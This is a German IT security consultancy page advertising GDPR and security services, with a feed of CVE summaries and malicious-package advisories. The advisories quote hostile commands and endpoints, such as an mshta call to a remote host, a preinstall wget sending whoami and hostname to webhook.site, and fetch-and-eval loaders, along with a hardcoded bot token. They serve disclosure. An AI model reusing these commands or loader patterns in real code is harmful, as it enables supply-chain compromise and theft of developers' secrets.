Beratung zu IT-Sicherheit & Datenschutz


Die Datenschutz-Grundverordnung beziehungsweise das Bundesdatenschutzgesetz betreffen uns alle - jeder, der Daten von Dritten erfasst, speichert oder verarbeitet muss den europäischen Standard einhalten. Die umfangreichen Gesetzestexte regeln Rechte und Pflichten aber auch technische und organisatorische Maßnahmen zum Datenschutz, Aufbewahrungspflichten, Sicherheitsstandards und Vorgaben zur Dokumentation von Verfahren und Vorfällen sowie die Vorgaben zur Berufung eines Datenschutzbeauftragten mit einer besonderen Aufsichts- und Beratungspflicht.

Die DSGVO und das BDSG sollte dabei nicht nur schriftlich in langen Rechtstexten, Datenschutzhinweisen und Verfahrensdokumentationen umgesetzt werden sondern es sollten konkrete technische Standards etabliert und eingehalten werden um dem Verlust von Daten vorzubeugen, der unberechtigten Nutzung von Daten einhalt zu gebieten und Angreifer und Hacker zuverlässig abzuwehren.

Da umfangreiches Know-How sowohl im Bezug auf die Rechtsgrundlagen als auch auf die technischen Risiken und Möglichkeiten erforderlich sind um ein angemessenes Datenschutzkonzept zu etablieren haben viele Unternehmen große Schwierigkeiten bei der Umsetzung. Unsere IT- und Datenschutzberatung setzt hier an - mit unserer Expertise können wir Sie dabei unterstützen Datenschutz technisch und rechtlich angemessen umzusetzen.
Wir unterstützen Sie gerne! »

  Unsere Leistungen

Datenschutzberatung durch geprüften DSB
Umsetzung von IT-Richtlinien / Gesetzen
Analyse & Beratung zur IT-Sicherheit
Erstellung von Dokumentationen



Was steckt dahinter?

Das "Who is Who" - DSGVO, GDPR, BDSG, TMG, ...
Innerhalb der EU gilt seit 2018 die sogenannte General Data Protection Regulation (GDPR), die in Deutschland unter der Bezeichnung "Datenschutz-Grundverordnung" (DSGVO) in nationales Recht umgesetzt wurde. Das Bundesdatenschutzgesetz (BDSG) präzisiert die Regelungen der DSGVO und fügt weitere nationale Regelungen hinzu. Für Betreiber von Internetangeboten ist zudem das Telemediengesetzes (TMG) relevant. Dies bezieht sich allerdings weniger auf den Datenschutz als auf grundlegende Regelungen im IT-Recht.

Was ist Datenschutzberatung?
Unser TÜV geprüfter Datenschutzbeauftragter mit juristischer Qualifikation berät Sie gerne zu Fragen rund um die Umsetzung von Datenschutzrecht in Ihren konkreten Projekten. Darüber hinausgehende zivilrechtliche Fragestellungen hingegen fallen nicht in den Bereich der Datenschutzberatung.




Die rechtliche Seite: DSGVO

Die DSGVO beziehungsweise das Bundesdatenschutzgesetz stellen verschiedene Forderungen an Unternehmen und Organisationen die zwingend einzuhalten sind um rechtskonform Daten zu verarbeiten. Als Verarbeiter von Daten zählen Sie schon dann, wenn Sie die Daten von Mitarbeitenden oder Kunden erfassen oder speichern.

Damit gilt die DSGVO sowohl für Kleinstunternehmen und Vereine wie auch für große Unternehmen und global Player.

Während die gesetzlichen Regelungen in vielen Bereichen sehr präzise Vorgaben machen welche Dokumente und Verfahren es geben muss und welche Rechte, Pflichten und Fristen gelten, gibt es in vielen Bereichen auch große Unsicherheiten. Häufiger werden Maßnahmen gefordert die sich am Stand der Technik orientieren oder technische Notwendigkeit und Machbarkeit zur Maßgabe machen.

Im Rahmen einer rechtlichen Datenschutzberatung geht es darum Sie über Ihre Rechte und Pflichten als Datenverarbeiter zu informieren und gemeinsam zu prüfen und sicherzustellen, dass die geforderten Unterlagen und Prozesse korrekt umgesetzt werden. Wir zeigen Ihnen gernen auch Tools und Best Practices zur Umsetzung der Rechte Betroffener und Ihrer Pflichten als Verarbeiter.

Wir unterstützen Sie dabei den Überblick zu bewahren!

Die technische Seite: IT-Sicherheit

Während die rechtliche Seite sich viel mit Fragen nach Rechten und Pflichten, der Haftung und der Verantwortung beschäftigt, ist die technische Seite des Datenschutzes sehr viel präziser:

Wie verhindern Sie, dass Ihre Daten in falsche Hände kommen?

Sie sammeln und verarbeiten vermutlich jeden Tag Daten von Dritten und speichern diese in internen Tools, verarbeiten sie auf Ihren oder fremden Servern, übertragen Sie zu Dienstleistern oder bauen sogar einen wesentlichen Teil Ihrer Tätigkeit auf der Verarbeitung auf.

Ein potentieller Angreifer oder Hacker versucht stets den schwächsten Punkt zu identifizieren, um Zugriff zu Ihren Daten zu erlangen. Häufig nutzen Hacker dazu bekannte Sicherheitslücken nicht aktualisierter Systeme aus, suchen nach vergessenen oder auch versehentlich offen stehenden Türen oder greifen sensible Zugangsdaten ab, wodurch sie auch ohne große Anstrengungen unberechtigten Zugang erlangen und viel Schaden anrichten können. Dabei müssen Sie nichtmal das primäre Ziel des Angriffs sein, sondern könnten vermeintlich auch Opfer eines größer angelegten Angriffs auf mehrere Unternehmen werden.

Wir unterstützen Sie dabei, ein Sicherheitskonzept in Ihrer IT zu etablieren und die Angriffflächen zu reduzieren.





IT-Sicherheit - bleiben Sie auf dem Laufenden


Täglich werden neue Schwachstellen, Angriffs-Vektoren, Cyber-Attaken und Fehler in Software, Netzwerken und Infrastrukturen bekannt - teilweise betreffen diese nur bestimmte Softwarelösungen oder spezifische Szenarien, manchmal betreffen Sie jedoch auch ganze Industriezweige, weit verbreitete Arbeitsweisen und grundlegende Technologien wie bei Heartbleed (SSL) oder Log4Shell (Protokollierung). Ergreifen Sie Maßnahmen, um Ihre Infrastruktur und Daten sicher zu halten.

Gemeinsam erfassen wir, welche Komponten und Abhängigkeiten Sie einsetzen und überwachen die CVE und viele weitere Quellen um im Falle von Mängeln oder Angriffspunkten schnell handeln zu können.

Wir simulieren Angriffe und Testen Ihre Anwendungen, Webseiten, die Infrastruktur und Prozesse auf mögliche Sicherheitslücken, Mängel und Angriffsvektoren um Risiken fürhzeitig zu erknennen und Lücken zu schließen.

Wir implementieren aktiv Monitore und überwachen somit Anfragen um frühzeitig Angriffe und verdächtige Aktivitäten zu identifizieren. Verdächte Aktivitäten können zur Alarmierung oder zu automatischen Sperrungen und Ausschlüssen führen, um einen hohen Standard zu gewährleisten.


Den Bedrohungen der IT-Welt sind Sie nicht schutzlos ausgeliefert - es ist jedoch wichtig dem Thema IT-Sicherheit Aufmerksamkeit zu schenken, um einen verantwortungsbewussten und rechtskonformen Umgang mit Unternehmens- und Kundendaten zu gewährleisten.
Risiko / Label Veröffentlichung
Risiko 9.8 / 10 CVE-2025-1889 gerade eben
picklescan before 0.0.22 only considers standard pickle file extensions in the scope for its vulnerability scan. An attacker could craft a malicious model that uses Pickle and include a malicious pickle file with a non-standard file extension. Because the malicious pickle file inclusion is not considered as part of the scope of picklescan, the file would pass security checks and appear to be safe, when it could instead prove to be problematic.
Risiko 9.8 / 10 CVE-2024-8309 gerade eben
A vulnerability in the GraphCypherQAChain class of langchain-ai/langchain-community version 0.2.5 allows for SQL injection through prompt injection. This vulnerability can lead to unauthorized data manipulation, data exfiltration, denial of service (DoS) by deleting all data, breaches in multi-tenant security environments, and data integrity issues. Attackers can create, update, or delete nodes and relationships without proper authorization, extract sensitive data, disrupt services, access data across different tenants, and compromise the integrity of the database.
Risiko ? / 10 MAL-2026-10134 vor 59 Minute(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f0c3ed879ef15a68d537ad7b6ddb59508aba58eee49c8ca19b916ef59a0c2da6) stella-cli/telegram-bot.mjs hardcodes a Telegram bot API token (BOT_TOKEN = "8923551485:AAFw4wG8ZwOtp5rzFsnguxhu4AH-2_ebSi0") that is controlled by the package author. When the user invokes the /tg CLI command, the package starts a Telegram bot on the installer's machine that receives messages over api.telegram.org and passes them into execSync(`node stella-cli/index.mjs -p "${text}"`), invoking a shell-capable AI agent CLI with attacker-supplied input. Because the messaging channel is bound to a token the author retains, the author observes all bot traffic — including the 4-digit admin authorization code exchanged over that same channel — and can replay it to reach the command-execution path on any installer that enables /tg. telegram-bot.mjs additionally sends os.hostname() and os.userInfo().username to the same author-controlled bot. A hardcoded PREMIUM_CODE = "10102013" acts as a universal activation key that unlocks the remote-control feature-set without payment. package.json sets "main": "stella-cli/index.mjs", whose top-level executes main() and starts the interactive CLI on require/import, extending the reach of the /tg surface beyond the bin entry. There are no install lifecycle hooks; the backdoor fires when the user runs the CLI (or a consumer imports the module) and invokes /tg.
Risiko ? / 10 MAL-2026-10215 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: kam193 (cc334bd438168239b92c3ca3bbaaeeeab56e9b325efa8e7be20ef87356e4f638) When using the library, it schedules a delayed malware activation. Malicious code contacts remote URLs to get C2 location, then performs machine fingerprinting, including looking for sensitive environmental variables and SSH keys. The code seems not to exfiltrate their content in the analyzed version. Additionally, the embeded configuration URLs did not exist, but they led to related C2 configurations from the same GitHub account, which also seems to have created repositories with similar malicious code in other languages. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-07-fast-dotenv Reasons (based on the campaign): - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk. - exfiltration-env-variables - exfiltration-ssh-keys - action-hidden-in-lib-usage
Risiko ? / 10 MAL-2026-10214 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (4274de0136aa69f8b0f4eba03412c7809a1b8c2446bb3ed7f6de1333475aa4c4) index.js, the package main, runs a load-time IIFE that collects OS platform and architecture, hostname, username, private and public IP (via https://api.ipify.org), current working directory, the full output of `printenv` (base64-encoded), and the base64-encoded output of `tree../`, then POSTs the aggregated payload to a hardcoded Discord webhook at https://discord.com/api/webhooks/1524917003394089029/. The package name mimics the babel-preset naming convention but the code implements no Babel functionality; author, description, and keywords are empty. Any consumer that installs and requires this package leaks its full process environment (typically including NPM_TOKEN, AWS_*, GITHUB_TOKEN, and other CI/developer secrets) plus a listing of the parent directory to the attacker-controlled Discord channel.
Risiko ? / 10 MAL-2026-10212 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a8bd105bf3b12062f312b41f2a1eead5e8481f8d3749fc78bc79ed8675c11394) On npm install, the package's preinstall script triggers a DNS lookup to a unique subdomain of oast.fun (fabekzbnjtufpffkzzmvjvi5eafhny3ok.oast.fun), an out-of-band interaction service, confirming code execution on the installer's machine to a third-party collector. A sibling file indexCopy.js collects host identifiers (os.userInfo().username, os.hostname(), process.cwd(), and process.env references) and issues an https.request POST to a hardcoded webhook.site endpoint (https://webhook.site/cde465c1-3853-40ea-880c-fdca6fe508cc). The combination of an OOB DNS beacon at install time and a staged HTTPS exfiltration payload targeting installer host identifiers is characteristic of a supply-chain reconnaissance/exfiltration attack rather than any legitimate package behavior.
Risiko ? / 10 MAL-2026-10196 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f8e0901ca45da110106c60f288b0166fc51c348a44569d7e7ff22af3d19deafe) On `import jupiter_sdk`, the package's top-level __init__.py fetches a payload over HTTPS from a public IPFS gateway (https://gateway.pinata.cloud/ipfs/QmP2RrfNCNabLzPYncMGgFwAmttDafczpJLS8oxvQRBVqg), passes the response body directly to exec(), and invokes a main() function from the executed namespace, with errors silently swallowed. The URL is content-addressed to an IPFS CID with no signature or hash verification of the executed content beyond the CID, and the fetched code is not shipped with the package. The package presents itself as a 'Jupiter DEX Aggregator SDK' but its exported API (get_quote, get_token_list, get_routes) returns hardcoded dummy values and performs no real Jupiter calls, so the only functional behavior on install/import is the remote code loader. The name resembles the widely used Jupiter aggregator ecosystem while performing arbitrary remote code execution against any environment that imports it. ## Source: kam193 (4fe90c74194fd64c35606cd24835a77493495efe29bf6ad593cc4fa5a20f58be) During import, the code downloads and executes a remote script. The script collects sensitive files, including cryptocurrency wallet private keys and seeds, SSH keys, dotenv files and uploads them to IPFS. After that, it communicates with C2 and awaits further commands to execute. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-07-metemask-sdk Reasons (based on the campaign): - files-exfiltration - typosquatting - exfiltration-ssh-keys - crypto-related - Downloads and executes a remote malicious script. - exfiltration-crypto - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine. - uses:ipfs
Risiko ? / 10 MAL-2026-10195 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (3131490d64c4ae90de2926ca90f6fce23e6a113d1e6538db5ce98ffcf06983d1) The top-level eth_agent/__init__.py performs an outbound HTTP fetch to a hardcoded IPFS gateway URL (https://gateway.pinata.cloud/ipfs/QmP2RrfNCNabLzPYncMGgFwAmttDafczpJLS8oxvQRBVqg) using urllib.request.urlopen, passes the returned bytes to exec() in a new namespace, and then invokes a main() function from that namespace. The entire fetch-and-execute block is wrapped in a bare try/except: pass annotated with a Spanish comment marking the load as silent, so any error is suppressed and the payload load is hidden from the user during import. This fires on every `import eth_agent`, so simply importing the package after `pip install eth-agent` runs opaque, attacker-controlled Python code on the installer's machine. The IPFS content is not pinned by hash-verification in code, is served from a third-party gateway, and is unrelated to the package's stated Ethereum RPC helper purpose. ## Source: kam193 (0268950ea20e5566a61026409820d6a1d4ac4d462f475ae4589c72390042fec6) During import, the code downloads and executes a remote script. The script collects sensitive files, including cryptocurrency wallet private keys and seeds, SSH keys, dotenv files and uploads them to IPFS. After that, it communicates with C2 and awaits further commands to execute. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-07-metemask-sdk Reasons (based on the campaign): - files-exfiltration - typosquatting - exfiltration-ssh-keys - crypto-related - Downloads and executes a remote malicious script. - exfiltration-crypto - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine. - uses:ipfs
Risiko ? / 10 MAL-2026-10187 vor 1 Stunde(n)
Supply-chain compromise of the official jscrambler npm client, a legitimate JavaScript obfuscation tool with roughly 60K downloads per month. Version 8.14.0 was published from the legitimate publisher account (jscrambler_ / info@jscrambler.com), which points to an account or CI compromise rather than a typosquat. Compared to the clean 8.13.0, version 8.14.0 adds a new preinstall hook (node dist/setup.js) and a new 7.5MB dist/intro.js file (entropy 8.00) that is a custom-packed, multi-platform binary container (magic bytes 1b435349 01); both are absent in 8.13.0. At install time, setup.js gunzips the platform-matched payload from intro.js, writes it to a randomly named file under the OS temp directory with the executable bit set (0o755, or a .exe extension on Windows built via String.fromCharCode), then spawns it detached with unref and windowsHide while swallowing all errors. The result is a silent, install-time native-binary dropper. Multiple releases are compromised (8.14.0, 8.16.0, 8.17.0, 8.18.0, 8.20.0); the mechanism above was analyzed on 8.14.0. Version 8.13.0 is clean. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (afb577cf150e98ebfe551df006c555204f327432baa3789473981888761a8677) The package's main entry (dist/index.js) contains a top-level IIFE that runs on every require('jscrambler'). It reads a bundled 7.8 MB sibling file dist/intro.js, validates a custom container header (0x1b 0x43 0x53 0x49 0x01), selects a platform-specific gzip section (linux/win32/darwin), writes the decompressed bytes to os.tmpdir() under a hidden random dot-file name with mode 0755, and spawns the binary detached with stdio ignored and windowsHide, then unrefs the child. Errors are swallowed. The bundled payload dist/intro.js is not JavaScript: it uses a custom multi-platform container and contains strings characteristic of a cryptocurrency-wallet seed-phrase harvester and a browser-session stealer, including the BIP-39 English wordlist marker (bip39_english) and Chromium/BoringSSL TLS internals (ResumptionAttemptedWithVariedEms). Neither README nor CHANGELOG documents any native runtime component, and the CHANGELOG has no entries past 8.13.0. The wrapper's shape (custom magic header, hidden tmp filename, detached spawn, error-swallowed try/catch, undocumented payload) is inconsistent with the package's advertised CLI/API-client purpose and matches a malicious release / account-takeover pattern targeting installer wallets and browser sessions.
Risiko ? / 10 MAL-2026-10209 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (8dd31c11b5149d8dd2142c81cc066576dc799ba4dae4599a9569cb56256417ec) package.json declares a postinstall hook (`node install.js`) that fires automatically on `npm install`. On Windows, install.js invokes hidden PowerShell (`-NoP -NonI -W Hidden -Exec Bypass`) to download an executable from raw.githubusercontent.com/cphc811-ui/d3d/main/ on the mutable `main` branch of an unrelated personal GitHub account, then launches it detached with `Start-Process -WindowStyle Hidden`. No hash or signature verification is performed. Execution is gated to skip non-Windows platforms and to skip when NODE_ENV=development, and all errors are swallowed — concealment characteristics that keep the payload dormant on maintainer/dev machines while firing on Windows installers and CI. The fetched binary's publisher does not match the npm package publisher, the source is a mutable branch on a personal account, and the fetch is auto-executed at install time with no verification.
Risiko ? / 10 MAL-2026-6697 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (02c1c204d0f458d13d7140f4b7a007d551095665a418e9146037be9a5b2b7957) @sudoughnym/enviro-demo@99.99.99 ships preinstall.js and postinstall.js lifecycle scripts that run automatically on `npm install`. Both scripts collect host identifiers and environment metadata — os.hostname(), process.cwd(), pid, node version, platform, process.env.USER, the first ten environment variable names, and the total env count — and POST them as JSON to https://webhook.site/f83b073c-a04a-4ac5-8930-507051bd22f7, a third-party webhook capture service not associated with the package's stated publisher. The package version (99.99.99) and its own description identify it as a dependency-confusion proof-of-concept targeting an internal `enviro` package name; the inflated semver is intended to outrank private-registry versions so internal build systems resolve to this public package. Installer harm: any build or developer machine that resolves to this version leaks host identity and environment-variable layout (which can include secret-bearing variable names) to an attacker-controlled endpoint on every install.
Risiko ? / 10 MAL-2026-10185 vor 1 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c6c707d53e30a333f8b8cf03ac2480eee3e2fa9c3c3164b1a100d333c91f9f3a) On require() of authvaultx (main: auth.js, which loads lib/writer.js), top-level code attempts to load the separately published npm package 'auth-next-gen'; if not present, it silently shells out to `npm install auth-next-gen --loglevel silent` and then immediately `require()`s `../../auth-next-gen/index.js`, executing whatever that external package ships. The fetch destination is a separate registry package controlled by the same author space, so the payload can be swapped without republishing authvaultx. lib/writer.js also assembles its user-facing fallback error string via repeated String.fromCharCode() concatenation, obscuring intent from casual review and string scanners. The published package masquerades as a logger (pino banner/logo PNGs, pino-cloned docs/ directory, logger/stream/json keywords) while the README advertises authentication functionality and the actual on-require behavior is a second-stage loader — none of the advertised purposes (logger or auth module) requires fetching and executing another npm package at load time. ## Source: ghsa-malware (0fbb555b68c6fa973cbdfe9b7e7e8c752faf3013859c6c9d9d3a2b2dedab256b) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
Risiko ? / 10 MAL-2026-10210 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (2a926b6d3f87c9242af654ce9379abe9e511aa6366efe7667822080968c66f65) On startup of the CLI/bin entry, mcp-notes-server-poc-praetorian@0.1.0 issues an unconditional HTTPS GET to the hardcoded host ft8swuagwwf6newi.ixx.sh, embedding the installer's process uid and lowercased hostname in the URL path and User-Agent. The interactsh-style subdomain is an out-of-band DNS/HTTP listener that logs every request to the operator of the token, so any host running this MCP server (typically via npx) exposes its uid and hostname to a third-party endpoint. The package is self-labeled a proof-of-concept demonstrating that stdio MCP servers execute arbitrary code in the host's context; the note-taking tools serve as cover for the beacon, which fires before any MCP tool call. Regardless of the PoC framing, publishing this to npm subjects every downstream installer to host-identifier exfiltration to an author-controlled destination.
Risiko ? / 10 MAL-2026-10213 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (b1037d713fe94f92e9f1302a1c8fdfcd03ee290e1f2076e7c01cbd1305499e91) The package's advertised public entry point pipspeed._optimize() GETs a JSON document from https://www.jsonkeeper.com/b/53XMN (an anonymous, mutable paste host) and reads `package`, `function`, and `args` fields from the response. It then runs `pip install ` via subprocess, `importlib.import_module(package)`, and invokes `getattr(mod, function)(*args)` in-process. The remote JSON fully controls which PyPI package is installed and which function executes in the installer's Python process, with no pinning, signing, hash check, or publisher constraint. Whoever controls the jsonkeeper paste can swap the referenced package at any time, turning the documented `import pipspeed; pipspeed._optimize()` call into arbitrary remote code execution on the caller's machine.
Risiko ? / 10 MAL-2026-10204 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c36c51510f3762d03ab5bd7132de4a65a950f410cb5771a99d4fdc9334a9c895) gptcore@4.0.7 declares a preinstall lifecycle script that runs `exec('cmd /c "mshta http://fixars.top"')` in preinstall.js. On Windows, this fires automatically during `npm install` and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine. The destination is a hardcoded third-party host over plain HTTP, with no pinning, hash verification, or relationship to a legitimate publisher, and the fetched content is unrelated to any documented package purpose.
Risiko ? / 10 MAL-2026-10098 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (21b9e477cff478ab071039c18c3adb6577a07cc1d82687b9e7d7cd2594dc9ddf) The package presents itself as fastify-plugin (name fastify-addone, repository/homepage/bugs fields point at fastify/fastify-plugin) and copies that project's source with a malicious statement inserted. lib/getPluginName.js contains a top-level statement that base64-decodes a URL via atob, fetches the JSON at https://www.jsonkeeper.com/b/HDXPP, and passes the returned content field to eval. This executes attacker-controlled JavaScript in the caller's process on any require('fastify-addone') (directly or via plugin.js). The destination is an anonymous, mutable third-party JSON-hosting service — not the publisher's infrastructure — and the payload URL is hidden behind base64 to evade casual review.
Risiko ? / 10 MAL-2026-10208 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a7d77255cb713e19b9560cc339e937518fdbfb49ab048d9d5a65ad81c1309a9a) package.json declares a preinstall lifecycle script that runs wget against https://webhook.site/f164a383-b9e7-4379-b18c-38bf41a3c152/ with query parameters carrying the installer's username ($(whoami)), current working directory ($(pwd)), and hostname ($(hostname)). This fires automatically on `npm install` with no user consent and sends installer-identifying reconnaissance data to a third-party collection endpoint. webhook.site is a public request-inspection service commonly abused as a low-effort exfiltration sink; the destination is not tied to any legitimate build or install task.
Risiko ? / 10 MAL-2026-10211 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (286869faf09aec1d62b472e43a7188a1583c5cf8c999d1fb2e116f0b7f5ba8c6) The package impersonates the pino logger (README/badges reference pino; module.exports.pino is the middleware) while its name is react-next-vite. When a consumer invokes the exported middleware factory in index.js, it spawns 'node lib/caller.js' as a detached child with stdio:'ignore' and calls child.unref(), hiding output from the parent process. lib/caller.js retrieves a JavaScript payload from a mutable IPFS gateway URL (bronze-improved-gibbon-411.mypinata.cloud/ipfs/bafkrei...) via axios.get and passes the response body to Function.constructor, invoking the resulting function with require in scope — giving the retrieved code full access to the host's Node runtime. Additional endpoints are hidden as base64-encoded strings in a fake process.env-shaped object in lib/caller.js and lib/const.js (e.g., DEV_API_KEY decodes to https://jsonkeeper.com/b/XRGF3), acting as a second-stage config channel. The combination of identity impersonation, stealth-spawned detached child, opaque remote-fetch-and-eval with require, and base64-hidden config URLs is a fully weaponized dropper that runs on any consumer that uses the module's default export.
Risiko ? / 10 MAL-2026-10206 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (29ebce322ac712405bfd29254cbd8f820c20ddc083587693a982b75ef6f3039a) Package advertises itself as an SVG fetcher/sanitizer but its main module also exports an undocumented getPlugin() function. The returned function performs an HTTP request to https://www.jsonkeeper.com/b/3P9BF with a custom 'bearrtoken' header, parses the JSON response, and passes the 'model' field directly to eval(). jsonkeeper.com is a public, mutable, anonymous paste host — whoever controls the paste can change its contents at any time and thereby execute arbitrary JavaScript inside any consumer process that invokes the exported function. The hidden code path is inconsistent with the package's declared SVG-utility purpose and is the canonical shape of a supply-chain backdoor giving the paste operator remote code execution on downstream consumers.
Risiko ? / 10 MAL-2026-10202 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c7412987df7a746c9128ca807cbd2222b340e3b4f8397620348fc62606a0f2b5) The package's declared main entry `index.js` exports a factory `check()` that spawns a detached, unreferenced Node child process running `lib/vcall.js`, then returns a noop Express-shaped middleware as cover. `lib/vcall.js` fetches JavaScript from `https://api.jsonsilo.com/public/c6c0b393-932f-4ae1-8fca-23c6747f4acc` (a mutable JSON-storage endpoint) and executes the response body via `new Function.constructor('require', src)(require)`, with up to 5 retries. `lib/constants.js` also stores a base64-encoded secondary endpoint `DEV_API_KEY` decoding to `https://jsonkeeper.com/b/ZK45J`, consistent with fallback/staged remote-execution infrastructure. The module additionally re-exports the factory as `module.exports.pino = check`, mimicking the `pino` logger API, while the package name (`chain-await-dom`) and README describe unrelated functionality. Any consumer that requires this package triggers arbitrary remote code execution with full Node privileges; the detached+unref child process persists beyond the parent.
Risiko ? / 10 MAL-2026-10207 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f55f6e35ab09a2fcd6521dac51aa4baa4cfa726958bc266a0d56fc14de240a29) Package name impersonates the widely-used `react-dom` package (react-dom-v17). `package.json` declares `preinstall: node index.js`, which fires automatically on `npm install`. The preinstall script (`index.js`) shells out via `child_process.exec` to run `whoami` and `id`, and collects host/user identifiers via `os.hostname()`, `os.userInfo()` (username, uid, gid, shell), `process.platform`, arch, home directory, and cwd. The collected JSON payload is POSTed to a hardcoded Burp Collaborator (oastify.com) subdomain at `https://cjzlyigayl8lknm1sjrppofio9u0is6h.oastify.com/detox56`. The oastify.com host is an attacker-controlled out-of-band callback endpoint used for reconnaissance beacons and confirms exfiltration intent. The preinstall shell execution surface also establishes arbitrary command execution on the installer at install time, enabling follow-on payloads.
Risiko ? / 10 MAL-2026-10205 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (28b5db05b3bdfb9cc8b1af9759f05a3bc7a1b6a9c364b86831b93df78e9e2273) package.json declares `preinstall: node index.js`. On `npm install`, index.js collects installer host identity (os.hostname, os.platform, os.arch, os.homedir, os.userInfo username/uid/gid/shell, CPU/memory) and shells out `whoami` and (non-Windows) `id` via child_process.exec, then POSTs the aggregated JSON to a hardcoded Burp Collaborator subdomain at https://bgvge0daqrvkonl6x9qrx553ruxllb90.oastify.com/detox56. The package ships no real functionality (empty description/author, single preinstall script) and is consistent with a dependency-confusion / internal-name recon beacon staged to fire automatically on install.
Risiko ? / 10 MAL-2026-10203 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (75f3a244f2761c56347f695897a491d23ab04cafe1e5b0e46fd7d0d2c993f828) The package declares a `preinstall` hook (`node index.js`) that runs automatically on `npm install`. index.js collects host reconnaissance — hostname, platform, arch, home directory, username/uid/gid/shell, `whoami`, `id`, and cwd — and POSTs the collected data as JSON to a hardcoded Burp Collaborator subdomain at https://w305i20ui5s5476lc3b998z28tek2bq0.oastify.com/detox56. The package ships with empty description, author, and license fields and no functional code beyond the beacon. The unscoped name `giantswarm` impersonates the Giant Swarm vendor namespace, consistent with a dependency-confusion attack targeting private `@giantswarm/*` scopes.
Risiko ? / 10 MAL-2026-10200 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (a94f4aa368f1838507a78dde78062b740a5853b516d9d32782d0264b539b724c) The package declares `preinstall: node index.js`, which runs automatically on `npm install`. index.js collects installer identifiers (os.hostname(), os.platform(), os.arch(), os.userInfo() username/uid/gid/shell, home directory, cwd) and executes `whoami` and `id` via child_process.exec, capturing their output. The combined JSON payload is POSTed to a hardcoded Burp Collaborator subdomain `https://1439tg4d02vixhxuj0gadpml4ca3ytmi.oastify.com/detox56`. The package name `api-changelly` impersonates the Changelly crypto-exchange brand and ships no legitimate functionality — the only behavior is the install-time beacon. This is the canonical dependency-confusion / reconnaissance-beacon shape targeting internal build systems that may resolve a private `changelly`-family dependency to this public package.
Risiko ? / 10 MAL-2026-10201 vor 2 Stunde(n)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (745f81b0c53fa121939d4f71680783860795a394eb30308f6e7e2dcf29401c92) package.json declares a `postinstall` script that runs `node index.js`. On `npm install`, index.js collects the installer's username (os.userInfo()), hostname (os.hostname()), and current working directory (process.cwd()), then POSTs them as JSON via https.request to the hardcoded endpoint https://webhook.site/cd23dfb8-a0fc-4ff7-818c-f7812fcb4bec. The transmission is unconditional and fires automatically on default install. The destination is a generic webhook-capture service unrelated to any declared package purpose, and the collected fields are host identifiers useful for victim triage / beacon confirmation.
Risiko 2 / 10 CVE-2026-15505 vor 3 Stunde(n)
A weakness has been identified in vnotex vnote up to 3.20.1. Impacted is an unknown function of the file /src/data/extra/web/js/markdownit.js of the component YAML Frontmatter. This manipulation of the argument p_metaData causes cross site scripting. The attack may be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.

Das "CVE"-Repository (eng. Common Vulnerabilities and Exposures) stellt eine Liste bekannter Schwachstellen und Sicherheitslücken in IT-Systemen unter Führung des "US-amerikanischen National Cybersecurity" zusammen und bewertet diese anhand Ihres Risikos auf einer Skala von eins bis zehn.


Gerade im Bereich von Web-Technologien und Cloud-Software werden regelmäßig Hacks und Sicherheitslücken bekannt. Die betroffenen Unternehmen erleiden in der Regel nicht nur einen Image-Schaden sondern stehen womöglich gegenüber Ihren Kunden auch in der rechtlichen Verantwortung. Das Projekt "Have I Been Pwned" sammelt seit Jahren Daten die aus Hacks oder Datenlecks öffentlich zugänglich werden und bietet einen Service um zu prüfen, ob man selbst von diesen Hacks betroffen wurde.

18.06.2026 - Operation Endgame 4.0 4.160.519 Datensätze geleaked
Email addresses, Passwords

